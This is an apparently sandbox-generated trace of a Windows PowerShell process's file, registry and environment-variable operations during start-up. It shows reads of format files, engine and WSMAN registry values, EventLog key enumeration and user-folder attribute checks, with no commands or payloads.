File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096	17	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3022	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 50, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 281	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096	62	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 3895	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 201, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 4096	21	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 3687	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 409, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 4096	4	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 2228	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 844, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 4096	4	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 3736	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 360, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\BGC6u8Oy yXGxkR	1	Fn
File	Get Info	filename = C:\Users\BGC6u8Oy yXGxkR, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\BGC6u8Oy yXGxkR\Desktop, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\BGC6u8Oy yXGxkR, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\BGC6u8Oy yXGxkR\Desktop, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\BGC6u8Oy yXGxkR, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\BGC6u8Oy yXGxkR\Desktop, type = file_attributes	3	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\BGC6u8Oy yXGxkR	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
